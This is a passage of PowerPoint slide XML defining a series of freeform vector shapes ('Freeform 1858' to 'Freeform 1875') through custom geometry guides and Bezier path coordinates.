                      <a:pt x="22" y="19"/>
                      <a:pt x="18" y="2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0" name="Freeform 1858"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5411" y="-909"/>
                <a:ext cx="19" cy="19"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 8"/>
                  <a:gd name="T1" fmla="*/ 7 h 8"/>
                  <a:gd name="T2" fmla="*/ 2 w 8"/>
                  <a:gd name="T3" fmla="*/ 6 h 8"/>
                  <a:gd name="T4" fmla="*/ 2 w 8"/>
                  <a:gd name="T5" fmla="*/ 1 h 8"/>
                  <a:gd name="T6" fmla="*/ 6 w 8"/>
                  <a:gd name="T7" fmla="*/ 2 h 8"/>
                  <a:gd name="T8" fmla="*/ 7 w 8"/>
                  <a:gd name="T9" fmla="*/ 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8"/>
                  <a:gd name="T17" fmla="*/ 8 w 8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8">
                    <a:moveTo>
                      <a:pt x="7" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="8"/>
                      <a:pt x="3" y="7"/>
                      <a:pt x="2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8" y="4"/>
                      <a:pt x="8" y="6"/>
                      <a:pt x="7" y="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1" name="Freeform 1859"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5697" y="-1006"/>
                <a:ext cx="212" cy="213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 74 w 90"/>
                  <a:gd name="T1" fmla="*/ 25 h 90"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 6 h 90"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 6 h 90"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 15 h 90"/>
                  <a:gd name="T8" fmla="*/ 40 w 90"/>
                  <a:gd name="T9" fmla="*/ 90 h 90"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 82 h 90"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 82 h 90"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 78 h 90"/>
                  <a:gd name="T16" fmla="*/ 74 w 90"/>
                  <a:gd name="T17" fmla="*/ 25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90"/>
                  <a:gd name="T29" fmla="*/ 90 w 90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90">
                    <a:moveTo>
                      <a:pt x="74" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="8"/>
                      <a:pt x="42" y="0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0" y="90"/>
                      <a:pt x="40" y="90"/>
                      <a:pt x="40" y="90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72" y="81"/>
                      <a:pt x="74" y="80"/>
                      <a:pt x="77" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="68"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="74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2" name="Freeform 1860"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5654" y="-989"/>
                <a:ext cx="187" cy="212"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 79"/>
                  <a:gd name="T1" fmla="*/ 80 h 90"/>
                  <a:gd name="T2" fmla="*/ 16 w 79"/>
                  <a:gd name="T3" fmla="*/ 63 h 90"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 10 h 90"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 27 h 90"/>
                  <a:gd name="T8" fmla="*/ 66 w 79"/>
                  <a:gd name="T9" fmla="*/ 8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90"/>
                  <a:gd name="T17" fmla="*/ 79 w 79"/>
                  <a:gd name="T18" fmla="*/ 90 h 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90">
                    <a:moveTo>
                      <a:pt x="66" y="80"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="90"/>
                      <a:pt x="30" y="82"/>
                      <a:pt x="16" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="44"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="49" y="8"/>
                      <a:pt x="63" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="66" y="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3" name="Freeform 1861"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5723" y="-911"/>
                <a:ext cx="49" cy="56"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 21"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 4 w 21"/>
                  <a:gd name="T3" fmla="*/ 17 h 24"/>
                  <a:gd name="T4" fmla="*/ 3 w 21"/>
                  <a:gd name="T5" fmla="*/ 3 h 24"/>
                  <a:gd name="T6" fmla="*/ 17 w 21"/>
                  <a:gd name="T7" fmla="*/ 7 h 24"/>
                  <a:gd name="T8" fmla="*/ 18 w 21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24"/>
                  <a:gd name="T17" fmla="*/ 21 w 21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24">
                    <a:moveTo>
                      <a:pt x="18" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="24"/>
                      <a:pt x="8" y="22"/>
                      <a:pt x="4" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="12"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="3" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="13" y="2"/>
                      <a:pt x="17" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="12"/>
                      <a:pt x="21" y="19"/>
                      <a:pt x="18" y="2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4" name="Freeform 1862"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5739" y="-893"/>
                <a:ext cx="17" cy="19"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 7"/>
                  <a:gd name="T1" fmla="*/ 7 h 8"/>
                  <a:gd name="T2" fmla="*/ 1 w 7"/>
                  <a:gd name="T3" fmla="*/ 6 h 8"/>
                  <a:gd name="T4" fmla="*/ 1 w 7"/>
                  <a:gd name="T5" fmla="*/ 1 h 8"/>
                  <a:gd name="T6" fmla="*/ 6 w 7"/>
                  <a:gd name="T7" fmla="*/ 2 h 8"/>
                  <a:gd name="T8" fmla="*/ 6 w 7"/>
                  <a:gd name="T9" fmla="*/ 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8"/>
                  <a:gd name="T17" fmla="*/ 7 w 7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8">
                    <a:moveTo>
                      <a:pt x="6" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="8"/>
                      <a:pt x="3" y="8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6" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="4"/>
                      <a:pt x="7" y="6"/>
                      <a:pt x="6" y="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5" name="Freeform 1863"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5708" y="-963"/>
                <a:ext cx="57" cy="82"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 24"/>
                  <a:gd name="T1" fmla="*/ 4 h 35"/>
                  <a:gd name="T2" fmla="*/ 5 w 24"/>
                  <a:gd name="T3" fmla="*/ 33 h 35"/>
                  <a:gd name="T4" fmla="*/ 15 w 24"/>
                  <a:gd name="T5" fmla="*/ 34 h 35"/>
                  <a:gd name="T6" fmla="*/ 23 w 24"/>
                  <a:gd name="T7" fmla="*/ 30 h 35"/>
                  <a:gd name="T8" fmla="*/ 18 w 24"/>
                  <a:gd name="T9" fmla="*/ 0 h 35"/>
                  <a:gd name="T10" fmla="*/ 0 w 24"/>
                  <a:gd name="T11" fmla="*/ 4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35"/>
                  <a:gd name="T20" fmla="*/ 24 w 24"/>
                  <a:gd name="T21" fmla="*/ 35 h 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35">
                    <a:moveTo>
                      <a:pt x="0" y="4"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="33"/>
                      <a:pt x="5" y="33"/>
                      <a:pt x="5" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="34"/>
                      <a:pt x="9" y="35"/>
                      <a:pt x="15" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="33"/>
                      <a:pt x="24" y="31"/>
                      <a:pt x="23" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="0"/>
                      <a:pt x="18" y="0"/>
                      <a:pt x="18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6" name="Freeform 1864"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5685" y="-1027"/>
                <a:ext cx="78" cy="75"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 33"/>
                  <a:gd name="T1" fmla="*/ 5 h 32"/>
                  <a:gd name="T2" fmla="*/ 4 w 33"/>
                  <a:gd name="T3" fmla="*/ 29 h 32"/>
                  <a:gd name="T4" fmla="*/ 19 w 33"/>
                  <a:gd name="T5" fmla="*/ 30 h 32"/>
                  <a:gd name="T6" fmla="*/ 33 w 33"/>
                  <a:gd name="T7" fmla="*/ 24 h 32"/>
                  <a:gd name="T8" fmla="*/ 28 w 33"/>
                  <a:gd name="T9" fmla="*/ 0 h 32"/>
                  <a:gd name="T10" fmla="*/ 0 w 33"/>
                  <a:gd name="T11" fmla="*/ 5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3"/>
                  <a:gd name="T19" fmla="*/ 0 h 32"/>
                  <a:gd name="T20" fmla="*/ 33 w 33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3" h="32">
                    <a:moveTo>
                      <a:pt x="0" y="5"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="29"/>
                      <a:pt x="4" y="29"/>
                      <a:pt x="4" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="31"/>
                      <a:pt x="11" y="32"/>
                      <a:pt x="19" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="29"/>
                      <a:pt x="33" y="26"/>
                      <a:pt x="33" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="28" y="0"/>
                      <a:pt x="28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7" name="Freeform 1865"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5569" y="-970"/>
                <a:ext cx="213" cy="210"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 75 w 90"/>
                  <a:gd name="T1" fmla="*/ 24 h 89"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 5 h 89"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 89"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 14 h 89"/>
                  <a:gd name="T8" fmla="*/ 41 w 90"/>
                  <a:gd name="T9" fmla="*/ 89 h 89"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 81 h 89"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 81 h 89"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 77 h 89"/>
                  <a:gd name="T16" fmla="*/ 75 w 90"/>
                  <a:gd name="T17" fmla="*/ 24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89"/>
                  <a:gd name="T29" fmla="*/ 90 w 90"/>
                  <a:gd name="T30" fmla="*/ 89 h 8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89">
                    <a:moveTo>
                      <a:pt x="75" y="24"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="7"/>
                      <a:pt x="43" y="0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1" y="89"/>
                      <a:pt x="41" y="89"/>
                      <a:pt x="41" y="89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2" y="80"/>
                      <a:pt x="75" y="79"/>
                      <a:pt x="77" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="67"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="75" y="2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8" name="Freeform 1866"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5529" y="-954"/>
                <a:ext cx="187" cy="210"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 79"/>
                  <a:gd name="T1" fmla="*/ 79 h 89"/>
                  <a:gd name="T2" fmla="*/ 15 w 79"/>
                  <a:gd name="T3" fmla="*/ 62 h 89"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 10 h 89"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 26 h 89"/>
                  <a:gd name="T8" fmla="*/ 66 w 79"/>
                  <a:gd name="T9" fmla="*/ 7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89"/>
                  <a:gd name="T17" fmla="*/ 79 w 79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89">
                    <a:moveTo>
                      <a:pt x="66" y="79"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="89"/>
                      <a:pt x="30" y="82"/>
                      <a:pt x="15" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="43"/>
                      <a:pt x="0" y="19"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="48" y="7"/>
                      <a:pt x="63" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="46"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="66" y="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9" name="Freeform 1867"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5595" y="-878"/>
                <a:ext cx="52" cy="59"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 22"/>
                  <a:gd name="T1" fmla="*/ 22 h 25"/>
                  <a:gd name="T2" fmla="*/ 5 w 22"/>
                  <a:gd name="T3" fmla="*/ 17 h 25"/>
                  <a:gd name="T4" fmla="*/ 4 w 22"/>
                  <a:gd name="T5" fmla="*/ 3 h 25"/>
                  <a:gd name="T6" fmla="*/ 18 w 22"/>
                  <a:gd name="T7" fmla="*/ 7 h 25"/>
                  <a:gd name="T8" fmla="*/ 18 w 22"/>
                  <a:gd name="T9" fmla="*/ 2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25"/>
                  <a:gd name="T17" fmla="*/ 22 w 22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25">
                    <a:moveTo>
                      <a:pt x="18" y="22"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="25"/>
                      <a:pt x="9" y="22"/>
                      <a:pt x="5" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="12"/>
                      <a:pt x="0" y="6"/>
                      <a:pt x="4" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="14" y="2"/>
                      <a:pt x="18" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="13"/>
                      <a:pt x="22" y="19"/>
                      <a:pt x="18" y="2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0" name="Freeform 1868"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5612" y="-859"/>
                <a:ext cx="18" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 8"/>
                  <a:gd name="T1" fmla="*/ 8 h 9"/>
                  <a:gd name="T2" fmla="*/ 2 w 8"/>
                  <a:gd name="T3" fmla="*/ 6 h 9"/>
                  <a:gd name="T4" fmla="*/ 2 w 8"/>
                  <a:gd name="T5" fmla="*/ 1 h 9"/>
                  <a:gd name="T6" fmla="*/ 6 w 8"/>
                  <a:gd name="T7" fmla="*/ 3 h 9"/>
                  <a:gd name="T8" fmla="*/ 7 w 8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9"/>
                  <a:gd name="T17" fmla="*/ 8 w 8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9">
                    <a:moveTo>
                      <a:pt x="7" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="9"/>
                      <a:pt x="3" y="8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8" y="4"/>
                      <a:pt x="8" y="7"/>
                      <a:pt x="7" y="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1" name="Freeform 1869"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5510" y="-1275"/>
                <a:ext cx="333" cy="295"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 333"/>
                  <a:gd name="T1" fmla="*/ 238 h 295"/>
                  <a:gd name="T2" fmla="*/ 210 w 333"/>
                  <a:gd name="T3" fmla="*/ 295 h 295"/>
                  <a:gd name="T4" fmla="*/ 333 w 333"/>
                  <a:gd name="T5" fmla="*/ 82 h 295"/>
                  <a:gd name="T6" fmla="*/ 24 w 333"/>
                  <a:gd name="T7" fmla="*/ 0 h 295"/>
                  <a:gd name="T8" fmla="*/ 0 w 333"/>
                  <a:gd name="T9" fmla="*/ 238 h 2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3"/>
                  <a:gd name="T16" fmla="*/ 0 h 295"/>
                  <a:gd name="T17" fmla="*/ 333 w 333"/>
                  <a:gd name="T18" fmla="*/ 295 h 2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3" h="295">
                    <a:moveTo>
                      <a:pt x="0" y="238"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="210" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23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2" name="Freeform 1870"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5720" y="-1207"/>
                <a:ext cx="170" cy="227"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 170"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 40 w 170"/>
                  <a:gd name="T3" fmla="*/ 215 h 227"/>
                  <a:gd name="T4" fmla="*/ 170 w 170"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 123 w 170"/>
                  <a:gd name="T7" fmla="*/ 14 h 227"/>
                  <a:gd name="T8" fmla="*/ 0 w 170"/>
                  <a:gd name="T9" fmla="*/ 225 h 227"/>
                  <a:gd name="T10" fmla="*/ 0 w 170"/>
                  <a:gd name="T11" fmla="*/ 227 h 2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0"/>
                  <a:gd name="T19" fmla="*/ 0 h 227"/>
                  <a:gd name="T20" fmla="*/ 170 w 170"/>
                  <a:gd name="T21" fmla="*/ 227 h 2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0" h="227">
                    <a:moveTo>
                      <a:pt x="0" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="40" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22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3" name="Freeform 1871"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5720" y="-1207"/>
                <a:ext cx="170" cy="227"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 170"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 40 w 170"/>
                  <a:gd name="T3" fmla="*/ 215 h 227"/>
                  <a:gd name="T4" fmla="*/ 170 w 170"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 123 w 170"/>
                  <a:gd name="T7" fmla="*/ 14 h 227"/>
                  <a:gd name="T8" fmla="*/ 0 w 170"/>
                  <a:gd name="T9" fmla="*/ 225 h 2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0"/>
                  <a:gd name="T16" fmla="*/ 0 h 227"/>
                  <a:gd name="T17" fmla="*/ 170 w 170"/>
                  <a:gd name="T18" fmla="*/ 227 h 2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0" h="227">
                    <a:moveTo>
                      <a:pt x="0" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="40" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="225"/>
                    </a:lnTo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4" name="Freeform 1872"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8262" y="-453"/>
                <a:ext cx="158" cy="172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 54 w 67"/>
                  <a:gd name="T1" fmla="*/ 21 h 73"/>
                  <a:gd name="T2" fmla="*/ 15 w 67"/>
                  <a:gd name="T3" fmla="*/ 4 h 73"/>
                  <a:gd name="T4" fmla="*/ 15 w 67"/>
                  <a:gd name="T5" fmla="*/ 4 h 73"/>
                  <a:gd name="T6" fmla="*/ 4 w 67"/>
                  <a:gd name="T7" fmla="*/ 7 h 73"/>
                  <a:gd name="T8" fmla="*/ 6 w 67"/>
                  <a:gd name="T9" fmla="*/ 12 h 73"/>
                  <a:gd name="T10" fmla="*/ 13 w 67"/>
                  <a:gd name="T11" fmla="*/ 52 h 73"/>
                  <a:gd name="T12" fmla="*/ 32 w 67"/>
                  <a:gd name="T13" fmla="*/ 67 h 73"/>
                  <a:gd name="T14" fmla="*/ 35 w 67"/>
                  <a:gd name="T15" fmla="*/ 73 h 73"/>
                  <a:gd name="T16" fmla="*/ 49 w 67"/>
                  <a:gd name="T17" fmla="*/ 69 h 73"/>
                  <a:gd name="T18" fmla="*/ 49 w 67"/>
                  <a:gd name="T19" fmla="*/ 69 h 73"/>
                  <a:gd name="T20" fmla="*/ 56 w 67"/>
                  <a:gd name="T21" fmla="*/ 66 h 73"/>
                  <a:gd name="T22" fmla="*/ 54 w 67"/>
                  <a:gd name="T23" fmla="*/ 21 h 7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7"/>
                  <a:gd name="T37" fmla="*/ 0 h 73"/>
                  <a:gd name="T38" fmla="*/ 67 w 67"/>
                  <a:gd name="T39" fmla="*/ 73 h 7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7" h="73">
                    <a:moveTo>
                      <a:pt x="54" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="6"/>
                      <a:pt x="26" y="0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0" y="22"/>
                      <a:pt x="3" y="38"/>
                      <a:pt x="13" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="59"/>
                      <a:pt x="25" y="64"/>
                      <a:pt x="32" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="73"/>
                      <a:pt x="35" y="73"/>
                      <a:pt x="35" y="73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52" y="69"/>
                      <a:pt x="54" y="68"/>
                      <a:pt x="56" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="58"/>
                      <a:pt x="66" y="37"/>
                      <a:pt x="54" y="21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5" name="Freeform 1873"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8226" y="-448"/>
                <a:ext cx="161" cy="179"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 57 w 68"/>
                  <a:gd name="T1" fmla="*/ 68 h 76"/>
                  <a:gd name="T2" fmla="*/ 14 w 68"/>
                  <a:gd name="T3" fmla="*/ 54 h 76"/>
                  <a:gd name="T4" fmla="*/ 12 w 68"/>
                  <a:gd name="T5" fmla="*/ 8 h 76"/>
                  <a:gd name="T6" fmla="*/ 55 w 68"/>
                  <a:gd name="T7" fmla="*/ 23 h 76"/>
                  <a:gd name="T8" fmla="*/ 57 w 68"/>
                  <a:gd name="T9" fmla="*/ 6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"/>
                  <a:gd name="T16" fmla="*/ 0 h 76"/>
                  <a:gd name="T17" fmla="*/ 68 w 68"/>
                  <a:gd name="T18" fmla="*/ 76 h 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" h="76">
                    <a:moveTo>
                      <a:pt x="57" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="76"/>
                      <a:pt x="27" y="70"/>
                      <a:pt x="14" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="37"/>
                      <a:pt x="0" y="17"/>
                      <a:pt x="12" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="0"/>
                      <a:pt x="42" y="6"/>
                      <a:pt x="55" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="39"/>
                      <a:pt x="68" y="59"/>
                      <a:pt x="57" y="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6" name="Freeform 1874"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8285" y="-382"/>
                <a:ext cx="45" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 19"/>
                  <a:gd name="T1" fmla="*/ 18 h 21"/>
                  <a:gd name="T2" fmla="*/ 4 w 19"/>
                  <a:gd name="T3" fmla="*/ 14 h 21"/>
                  <a:gd name="T4" fmla="*/ 3 w 19"/>
                  <a:gd name="T5" fmla="*/ 2 h 21"/>
                  <a:gd name="T6" fmla="*/ 15 w 19"/>
                  <a:gd name="T7" fmla="*/ 6 h 21"/>
                  <a:gd name="T8" fmla="*/ 15 w 19"/>
                  <a:gd name="T9" fmla="*/ 1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21"/>
                  <a:gd name="T17" fmla="*/ 19 w 19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21">
                    <a:moveTo>
                      <a:pt x="15" y="18"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="21"/>
                      <a:pt x="7" y="19"/>
                      <a:pt x="4" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="10"/>
                      <a:pt x="0" y="4"/>
                      <a:pt x="3" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="11" y="1"/>
                      <a:pt x="15" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="10"/>
                      <a:pt x="19" y="16"/>
                      <a:pt x="15" y="1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7" name="Freeform 1875"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8300" y="-368"/>
                <a:ext cx="16" cy="19"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 7"/>
                  <a:gd name="T1" fmla="*/ 7 h 8"/>
                  <a:gd name="T2" fmla="*/ 1 w 7"/>
                  <a:gd name="T3" fmla="*/ 6 h 8"/>
                  <a:gd name="T4" fmla="*/ 1 w 7"/>
